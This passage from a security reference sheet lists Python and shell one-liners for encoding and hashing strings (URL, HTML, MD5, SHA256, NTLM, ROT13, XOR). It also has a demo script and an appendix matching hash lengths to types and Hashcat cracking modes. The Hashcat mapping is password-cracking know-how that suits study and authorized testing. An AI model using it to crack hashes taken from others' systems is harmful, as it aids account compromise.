String  URL     quote(s, safe='')                                      python3 -c "from urllib.parse import quote; print(quote('s',safe=''))"
String  HTML    html.escape(s)                                         python3 -c "import html; print(html.escape('s'))"
String  MD5     hashlib.md5(s.encode()).hexdigest()                    echo -n "s" | md5sum
String  SHA256  hashlib.sha256(s.encode()).hexdigest()                 echo -n "s" | sha256sum
String  NTLM    hashlib.new('md4',s.encode('utf-16-le')).hexdigest()   echo -n "s" | iconv -t utf-16le | openssl dgst -md4
String  ROT13   codecs.encode(s, 'rot_13')                             echo "s" | tr 'A-Za-z' 'N-ZA-Mn-za-m'
Int     Hex     hex(n)                                                 printf '%x' n
Hex     Int     int(h, 16)                                             echo $((16#h))
Bytes   XOR     bytes(b^k for b in data)                               python3 -c "..."
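
As a quick sanity check, the Python column can be exercised in one short script. The sketch below wraps several rows in a hypothetical helper, demo_conversions; the NTLM row is left out because MD4 availability in hashlib depends on the local OpenSSL build.

```python
import base64
import codecs
import hashlib
import html
from urllib.parse import quote

def demo_conversions(s: str) -> dict[str, str]:
    """Apply several table rows to one input string."""
    return {
        'base64': base64.b64encode(s.encode()).decode(),
        'hex': s.encode().hex(),
        'url': quote(s, safe=''),
        'html': html.escape(s),
        'md5': hashlib.md5(s.encode()).hexdigest(),
        'rot13': codecs.encode(s, 'rot_13'),
    }

for name, value in demo_conversions('hello').items():
    print(f'{name:7} {value}')

# Single-byte XOR with key 0x20 flips ASCII letter case
print(bytes(b ^ 0x20 for b in b'abc'))  # b'ABC'
```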

Appendix: Hash Length Identification

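Length    Possible types          Hashcat mode
16        MySQL 3.x               200
32        MD5, NTLM, MD4          0, 1000, 900
40        SHA-1                   100
56        SHA-224                 1300
64        SHA-256                 1400
96        SHA-384                 10800
128       SHA-512                 1700
48:48     NetNTLMv1               5500
variable  NetNTLMv2               5600
13        DES crypt               1500
34        MD5 crypt ($1$)         500
60        bcrypt ($2a$)           3200
43        SHA-256 crypt ($5$)     7400
86        SHA-512 crypt ($6$)     1800

Lengths are character counts. For NetNTLMv1 the figure is the hex length of the LM and NT responses; for $5$ and $6$ it is the encoded digest after the salt, not the full crypt string.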
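
The raw hex rows of the table translate directly into a lookup. The sketch below covers only plain hex digests and returns candidates rather than a verdict, since length alone cannot distinguish MD5 from NTLM; identify_hex_hash is an illustrative name.

```python
import re

# (name, hashcat mode) candidates keyed by hex digest length
HEX_HASH_CANDIDATES = {
    16: [('MySQL 3.x', 200)],
    32: [('MD5', 0), ('NTLM', 1000), ('MD4', 900)],
    40: [('SHA-1', 100)],
    56: [('SHA-224', 1300)],
    64: [('SHA-256', 1400)],
    96: [('SHA-384', 10800)],
    128: [('SHA-512', 1700)],
}

def identify_hex_hash(candidate: str) -> list[tuple[str, int]]:
    """Return possible hash types for a plain hex digest, or [] if none match."""
    value = candidate.strip()
    if not re.fullmatch(r'[0-9a-fA-F]+', value):
        return []
    return HEX_HASH_CANDIDATES.get(len(value), [])

print(identify_hex_hash('da39a3ee5e6b4b0d3255bfef95601890afd80709'))
# [('SHA-1', 100)]
```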

Reference compiled for CIPHER training. All code tested for Python 3.10+. For interactive exploration, use CyberChef.
